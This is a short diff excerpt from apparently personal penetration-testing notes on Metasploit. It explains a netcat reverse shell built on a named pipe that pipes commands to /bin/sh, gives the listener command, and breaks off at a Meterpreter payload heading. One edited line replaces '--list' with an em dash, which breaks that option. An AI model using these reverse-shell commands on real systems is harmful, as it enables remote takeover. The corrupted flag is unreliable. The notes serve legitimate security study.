cardboard-iguana/hacking-notes/Notes/Using Metasploit.md

 * We then spin up a netcat instance directed at our local machine (`nc $LOCAL_IP $LOCAL_PORT`), direct the contents of the pipe into netcat’s STDIN (`0< /tmp/qdsrgu`), pipe the *output* of netcat to a shell we know probably exists (`| /bin/sh`), and finally redirect *both* STDOUT and STDERR back into the named pipe (`> /tmp/qdsrgu 2>&1`).
 * On the local machine, `nc -lvp $LOCAL_PORT` listens for the incoming netcat connection from the remote.
 Anything we type on STDIN here gets sent to the remote and piped to /bin/sh *there*.
 The output of /bin/sh is then sent to the named pipe, which dumps into (the remote) netcat, which then sends the data to the local machine where it ends up on STDOUT.

-Use `--list formats` to see available encoding formats.
+Use `—list formats` to see available encoding formats.

 ```bash
 # 32-bit Linux ELF Meterpreter payload